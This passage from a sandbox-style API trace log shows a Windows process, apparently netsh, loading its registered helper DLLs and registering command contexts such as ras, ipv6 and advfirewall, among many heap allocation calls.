Flags=0x0, Size=0x5e8) returned 0x2b56f88 [0307.958] GetProcessHeap () returned 0x2b30000 [0307.958] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b57a00) returned 1 [0307.958] RegisterHelper () returned 0x0 [0307.958] GetProcessHeap () returned 0x2b30000 [0307.958] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x630) returned 0x2b57578 [0307.958] GetProcessHeap () returned 0x2b30000 [0307.958] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b56f88) returned 1 [0307.958] RegisterHelper () returned 0x0 [0307.958] GetProcessHeap () returned 0x2b30000 [0307.959] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x678) returned 0x2b57bb0 [0307.959] GetProcessHeap () returned 0x2b30000 [0307.959] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b57578) returned 1 [0307.959] RegisterHelper () returned 0x0 [0307.959] GetProcessHeap () returned 0x2b30000 [0307.960] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x6c0) returned 0x2b56f88 [0307.960] GetProcessHeap () returned 0x2b30000 [0307.960] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b57bb0) returned 1 [0307.960] RegisterHelper () returned 0x0 [0307.960] GetProcessHeap () returned 0x2b30000 [0307.960] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x708) returned 0x2b57650 [0307.960] GetProcessHeap () returned 0x2b30000 [0307.960] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b56f88) returned 1 [0307.960] RegisterHelper () returned 0x0 [0307.960] GetProcessHeap () returned 0x2b30000 [0307.960] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x750) returned 0x2b57d60 [0307.961] GetProcessHeap () returned 0x2b30000 [0307.961] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b57650) returned 1 [0307.961] RegEnumValueW (in: hKey=0x108, dwIndex=0x8, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="nshhttp", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0307.961] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0307.961] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0307.961] GetProcessHeap () returned 0x2b30000 [0307.961] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc8) returned 0x2b47ae8 [0307.961] GetProcessHeap () returned 0x2b30000 [0307.961] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x10) returned 0x2b4e2e8 [0307.962] GetProcessHeap () returned 0x2b30000 [0307.962] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x18) returned 0x2b3e108 [0307.962] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0307.962] GetProcessHeap () returned 0x2b30000 [0307.962] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b471d8) returned 1 [0307.962] LoadLibraryExW (lpLibFileName="NSHHTTP.DLL", hFile=0x0, dwFlags=0x0) returned 0x6f6a0000 [0308.319] GetProcAddress (hModule=0x6f6a0000, lpProcName="InitHelperDll") returned 0x6f6a1c50 [0308.320] InitHelperDll () returned 0x0 [0308.320] RegisterHelper () returned 0x0 [0308.320] GetProcessHeap () returned 0x2b30000 [0308.320] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x798) returned 0x2b584b8 [0308.320] GetProcessHeap () returned 0x2b30000 [0308.320] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b57d60) returned 1 [0308.320] RegEnumValueW (in: hKey=0x108, dwIndex=0x9, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="nshipsec", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0308.321] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0308.321] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0308.321] GetProcessHeap () returned 0x2b30000 [0308.321] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xdc) returned 0x2b471d8 [0308.321] GetProcessHeap () returned 0x2b30000 [0308.321] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x12) returned 0x2b3de08 [0308.321] GetProcessHeap () returned 0x2b30000 [0308.321] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1a) returned 0x2b42bc8 [0308.321] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0308.321] GetProcessHeap () returned 0x2b30000 [0308.321] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b47ae8) returned 1 [0308.322] LoadLibraryExW (lpLibFileName="NSHIPSEC.DLL", hFile=0x0, dwFlags=0x0) returned 0x6f620000 [0309.923] GetProcAddress (hModule=0x6f620000, lpProcName="InitHelperDll") returned 0x6f623990 [0309.924] InitHelperDll () returned 0x0 [0309.924] RegisterHelper () returned 0x0 [0309.924] GetProcessHeap () returned 0x2b30000 [0309.924] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x7e0) returned 0x2b58c58 [0309.924] GetProcessHeap () returned 0x2b30000 [0309.924] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b584b8) returned 1 [0309.924] RegisterHelper () returned 0x0 [0309.924] GetProcessHeap () returned 0x2b30000 [0309.925] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x828) returned 0x2b59440 [0309.925] GetProcessHeap () returned 0x2b30000 [0309.925] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b58c58) returned 1 [0309.925] RegisterHelper () returned 0x0 [0309.925] GetProcessHeap () returned 0x2b30000 [0309.925] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x870) returned 0x2b57f98 [0309.925] GetProcessHeap () returned 0x2b30000 [0309.925] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b59440) returned 1 [0310.049] RegEnumValueW (in: hKey=0x108, dwIndex=0xa, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="nshwfp", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0310.049] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0310.049] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0310.049] GetProcessHeap () returned 0x2b30000 [0310.049] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xf0) returned 0x2b45fa8 [0310.049] GetProcessHeap () returned 0x2b30000 [0310.050] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xe) returned 0x2b54bc8 [0310.050] GetProcessHeap () returned 0x2b30000 [0310.050] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x16) returned 0x2b3df88 [0310.050] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0310.050] GetProcessHeap () returned 0x2b30000 [0310.050] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b471d8) returned 1 [0310.050] LoadLibraryExW (lpLibFileName="NSHWFP.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e4c0000 [0310.985] GetProcAddress (hModule=0x6e4c0000, lpProcName="InitHelperDll") returned 0x6e516ab0 [0310.986] InitHelperDll () returned 0x0 [0310.987] RegisterHelper () returned 0x0 [0310.987] GetProcessHeap () returned 0x2b30000 [0310.987] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8b8) returned 0x2b5a4a8 [0310.988] GetProcessHeap () returned 0x2b30000 [0310.988] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b57f98) returned 1 [0310.988] RegEnumValueW (in: hKey=0x108, dwIndex=0xb, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="p2pnetsh", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0310.988] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0310.988] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0310.988] GetProcessHeap () returned 0x2b30000 [0310.988] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x104) returned 0x2b4b038 [0310.988] GetProcessHeap () returned 0x2b30000 [0310.989] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x12) returned 0x2b3e008 [0310.989] GetProcessHeap () returned 0x2b30000 [0310.989] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1a) returned 0x2b57838 [0310.989] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0310.989] GetProcessHeap () returned 0x2b30000 [0310.989] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b45fa8) returned 1 [0310.989] LoadLibraryExW (lpLibFileName="P2PNETSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e470000 [0311.709] GetProcAddress (hModule=0x6e470000, lpProcName="InitHelperDll") returned 0x6e475910 [0311.710] InitHelperDll () returned 0x0 [0311.710] RegisterHelper () returned 0x0 [0311.710] GetProcessHeap () returned 0x2b30000 [0311.710] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x900) returned 0x2b5cd70 [0311.710] GetProcessHeap () returned 0x2b30000 [0311.710] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5a4a8) returned 1 [0311.710] RegisterHelper () returned 0x0 [0311.710] GetProcessHeap () returned 0x2b30000 [0311.710] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x948) returned 0x2b5d678 [0311.710] GetProcessHeap () returned 0x2b30000 [0311.711] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5cd70) returned 1 [0311.711] RegisterHelper () returned 0x0 [0311.711] GetProcessHeap () returned 0x2b30000 [0311.711] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x990) returned 0x2b5dfc8 [0311.711] GetProcessHeap () returned 0x2b30000 [0311.711] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5d678) returned 1 [0311.711] RegisterHelper () returned 0x0 [0311.711] GetProcessHeap () returned 0x2b30000 [0311.711] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x9d8) returned 0x2b5cd70 [0311.711] GetProcessHeap () returned 0x2b30000 [0311.711] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5dfc8) returned 1 [0311.724] RegisterHelper () returned 0x0 [0311.724] GetProcessHeap () returned 0x2b30000 [0311.724] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xa20) returned 0x2b5d750 [0311.725] GetProcessHeap () returned 0x2b30000 [0311.725] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5cd70) returned 1 [0311.725] RegisterHelper () returned 0x0 [0311.725] GetProcessHeap () returned 0x2b30000 [0311.725] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xa68) returned 0x2b5e178 [0311.725] GetProcessHeap () returned 0x2b30000 [0311.725] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5d750) returned 1 [0311.725] RegisterHelper () returned 0x0 [0311.725] GetProcessHeap () returned 0x2b30000 [0311.725] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xab0) returned 0x2b5cd70 [0311.725] GetProcessHeap () returned 0x2b30000 [0311.725] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5e178) returned 1 [0311.732] RegisterHelper () returned 0x0 [0311.732] GetProcessHeap () returned 0x2b30000 [0311.732] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xaf8) returned 0x2b5d828 [0311.732] GetProcessHeap () returned 0x2b30000 [0311.732] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5cd70) returned 1 [0311.732] RegEnumValueW (in: hKey=0x108, dwIndex=0xc, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="rpc", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0311.732] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0311.732] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0311.733] GetProcessHeap () returned 0x2b30000 [0311.733] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x118) returned 0x2b45dd0 [0311.733] GetProcessHeap () returned 0x2b30000 [0311.733] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dcf8 [0311.733] GetProcessHeap () returned 0x2b30000 [0311.733] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x16) returned 0x2b3e068 [0311.733] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0311.733] GetProcessHeap () returned 0x2b30000 [0311.733] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b4b038) returned 1 [0311.733] LoadLibraryExW (lpLibFileName="RPCNSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e430000 [0312.066] GetProcAddress (hModule=0x6e430000, lpProcName="InitHelperDll") returned 0x6e432ae0 [0312.067] InitHelperDll () returned 0x0 [0312.067] RegisterHelper () returned 0x0 [0312.067] GetProcessHeap () returned 0x2b30000 [0312.067] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xb40) returned 0x2b5e328 [0312.067] GetProcessHeap () returned 0x2b30000 [0312.067] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5d828) returned 1 [0312.068] RegisterHelper () returned 0x0 [0312.068] GetProcessHeap () returned 0x2b30000 [0312.068] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xb88) returned 0x2b5cd70 [0312.068] GetProcessHeap () returned 0x2b30000 [0312.068] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5e328) returned 1 [0312.068] RegEnumValueW (in: hKey=0x108, dwIndex=0xd, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="whhelper", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0312.068] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0312.069] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0312.069] GetProcessHeap () returned 0x2b30000 [0312.069] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x12c) returned 0x2b58e18 [0312.071] GetProcessHeap () returned 0x2b30000 [0312.071] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x12) returned 0x2b3dfa8 [0312.071] GetProcessHeap () returned 0x2b30000 [0312.071] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1a) returned 0x2b57860 [0312.071] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0312.071] GetProcessHeap () returned 0x2b30000 [0312.071] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b45dd0) returned 1 [0312.071] LoadLibraryExW (lpLibFileName="WHHELPER.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e420000 [0312.180] GetProcAddress (hModule=0x6e420000, lpProcName="InitHelperDll") returned 0x6e4218d0 [0312.180] InitHelperDll () returned 0x0 [0312.180] RegisterHelper () returned 0x0 [0312.180] GetProcessHeap () returned 0x2b30000 [0312.180] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xbd0) returned 0x2b5d900 [0312.180] GetProcessHeap () returned 0x2b30000 [0312.180] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5cd70) returned 1 [0312.180] RegEnumValueW (in: hKey=0x108, dwIndex=0xe, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="wlancfg", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0312.181] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0312.181] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0312.181] GetProcessHeap () returned 0x2b30000 [0312.181] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x140) returned 0x2b58f50 [0312.181] GetProcessHeap () returned 0x2b30000 [0312.181] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x10) returned 0x2b54cb8 [0312.181] GetProcessHeap () returned 0x2b30000 [0312.181] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x18) returned 0x2b3e128 [0312.181] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0312.181] GetProcessHeap () returned 0x2b30000 [0312.181] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b58e18) returned 1 [0312.181] LoadLibraryExW (lpLibFileName="WLANCFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e3e0000 [0314.269] GetProcAddress (hModule=0x6e3e0000, lpProcName="InitHelperDll") returned 0x6e3eabb0 [0314.269] InitHelperDll () returned 0x0 [0314.269] RegisterHelper () returned 0x0 [0314.269] GetProcessHeap () returned 0x2b30000 [0314.270] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc18) returned 0x2b614e8 [0314.270] GetProcessHeap () returned 0x2b30000 [0314.270] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5d900) returned 1 [0314.271] RegEnumValueW (in: hKey=0x108, dwIndex=0xf, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="wshelper", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0314.271] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0314.271] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0314.271] GetProcessHeap () returned 0x2b30000 [0314.271] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x154) returned 0x2b58628 [0314.271] GetProcessHeap () returned 0x2b30000 [0314.271] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x12) returned 0x2b3de28 [0314.271] GetProcessHeap () returned 0x2b30000 [0314.272] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1a) returned 0x2b577c0 [0314.272] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0314.272] GetProcessHeap () returned 0x2b30000 [0314.272] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b58f50) returned 1 [0314.272] LoadLibraryExW (lpLibFileName="WSHELPER.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e240000 [0314.696] GetProcAddress (hModule=0x6e240000, lpProcName="InitHelperDll") returned 0x6e241720 [0314.696] InitHelperDll () returned 0x0 [0314.697] RegisterHelper () returned 0x0 [0314.697] GetProcessHeap () returned 0x2b30000 [0314.697] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc60) returned 0x2b62910 [0314.697] GetProcessHeap () returned 0x2b30000 [0314.697] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b614e8) returned 1 [0314.697] RegEnumValueW (in: hKey=0x108, dwIndex=0x10, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="peerdistsh", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0314.698] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0314.698] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0314.698] GetProcessHeap () returned 0x2b30000 [0314.698] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x168) returned 0x2b5dd80 [0314.698] GetProcessHeap () returned 0x2b30000 [0314.698] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x16) returned 0x2b5a518 [0314.698] GetProcessHeap () returned 0x2b30000 [0314.698] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1e) returned 0x2b57950 [0314.698] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0314.698] GetProcessHeap () returned 0x2b30000 [0314.698] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b58628) returned 1 [0314.698] LoadLibraryExW (lpLibFileName="PEERDISTSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e190000 [0315.481] GetProcAddress (hModule=0x6e190000, lpProcName="InitHelperDll") returned 0x6e1ad390 [0315.481] InitHelperDll () returned 0x0 [0315.483] RegisterHelper () returned 0x0 [0315.483] GetProcessHeap () returned 0x2b30000 [0315.483] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xca8) returned 0x2b63578 [0315.484] GetProcessHeap () returned 0x2b30000 [0315.484] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b62910) returned 1 [0315.484] RegisterHelper () returned 0x0 [0315.484] GetProcessHeap () returned 0x2b30000 [0315.484] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xcf0) returned 0x2b64228 [0315.484] GetProcessHeap () returned 0x2b30000 [0315.484] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b63578) returned 1 [0315.485] RegCloseKey (hKey=0x108) returned 0x0 [0315.485] GetProcessHeap () returned 0x2b30000 [0315.485] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b34990) returned 1 [0315.485] GetProcessHeap () returned 0x2b30000 [0315.485] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b349b0) returned 1 [0315.488] GetProcessHeap () returned 0x2b30000 [0315.488] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b46c28 [0315.489] GetProcessHeap () returned 0x2b30000 [0315.489] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0315.489] RegisterContext () returned 0x0 [0315.490] GetProcessHeap () returned 0x2b30000 [0315.490] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b46c78 [0315.490] GetProcessHeap () returned 0x2b30000 [0315.490] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0315.491] RegisterContext () returned 0x0 [0315.576] _wcsicmp (_String1="ras", _String2="interface") returned 9 [0315.576] _wcsicmp (_String1="ras", _String2="interface") returned 9 [0315.576] GetProcessHeap () returned 0x2b30000 [0315.576] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x90) returned 0x2b64f20 [0315.576] GetProcessHeap () returned 0x2b30000 [0315.576] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b46c78) returned 1 [0315.800] RegisterContext () returned 0x0 [0315.802] GetProcessHeap () returned 0x2b30000 [0315.802] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b46c78 [0315.802] GetProcessHeap () returned 0x2b30000 [0315.802] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0315.803] RegisterContext () returned 0x0 [0315.806] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0315.806] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0315.806] GetProcessHeap () returned 0x2b30000 [0315.806] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x90) returned 0x2b54eb0 [0315.807] GetProcessHeap () returned 0x2b30000 [0315.807] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b46c78) returned 1 [0315.807] RegisterContext () returned 0x0 [0315.810] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0315.810] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0315.810] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0315.810] GetProcessHeap () returned 0x2b30000 [0315.810] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xd8) returned 0x2b47ae8 [0315.810] GetProcessHeap () returned 0x2b30000 [0315.810] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b54eb0) returned 1 [0315.811] RegisterContext () returned 0x0 [0315.812] _wcsicmp (_String1="diagnostics", _String2="aaaa") returned 3 [0315.812] _wcsicmp (_String1="diagnostics", _String2="ip") returned -5 [0315.812] _wcsicmp (_String1="diagnostics", _String2="ipv6") returned -5 [0315.813] _wcsicmp (_String1="diagnostics", _String2="aaaa") returned 3 [0315.813] _wcsicmp (_String1="diagnostics", _String2="ip") returned -5 [0315.813] GetProcessHeap () returned 0x2b30000 [0315.813] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x120) returned 0x2b5e388 [0315.813] GetProcessHeap () returned 0x2b30000 [0315.813] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b47ae8) returned 1 [0315.814] RegisterContext () returned 0x0 [0315.815] _wcsicmp (_String1="advfirewall", _String2="interface") returned -8 [0315.815] _wcsicmp (_String1="advfirewall", _String2="ras") returned -17 [0315.815] _wcsicmp (_String1="advfirewall", _String2="interface") returned -8 [0315.815] GetProcessHeap () returned 0x2b30000 [0315.815] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xd8) returned 0x2b47ae8 [0315.815] GetProcessHeap () returned 0x2b30000 [0315.815] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b64f20) returned 1 [0315.816] RegisterContext () returned 0x0 [0315.816] GetProcessHeap () returned 0x2b30000 [0315.816] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b46c78 [0315.816] GetProcessHeap () returned 0x2b30000 [0315.816] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0315.816] RegisterContext () returned 0x0 [0315.816] _wcsicmp (_String1="firewall", _String2="consec") returned 3 [0315.816] _wcsicmp (_String1="firewall", _String2="consec") returned 3 [0315.816] GetProcessHeap () returned 0x2b30000 [0315.817] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x90) returned 0x2b64f20 [0315.817] GetProcessHeap () returned 0x2b30000 [0315.817] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b46c78) returned 1 [0315.817] RegisterContext () returned 0x0 [0315.817] _wcsicmp (_String1="monitor", _String2="consec") returned 10 [0315.817] _wcsicmp (_String1="monitor", _String2="firewall") returned 7 [0315.817] _wcsicmp (_String1="monitor", _String2="consec") returned 10 [0315.817] _wcsicmp (_String1="monitor", _String2="firewall") returned 7 [0315.818] GetProcessHeap () returned 0x2b30000 [0315.818] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xd8) returned 0x2b4b038 [0315.818] GetProcessHeap () returned 0x2b30000 [0315.818] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b64f20) returned 1 [0315.818] RegisterContext () returned 0x0 [0315.818] _wcsicmp (_String1="mainmode", _String2="consec") returned 10 [0315.818] _wcsicmp (_String1="mainmode", _String2="firewall") returned 7 [0315.818] _wcsicmp (_String1="mainmode", _String2="monitor") returned -14 [0315.818] _wcsicmp (_String1="mainmode", _String2="consec") returned 10 [0315.819] _wcsicmp 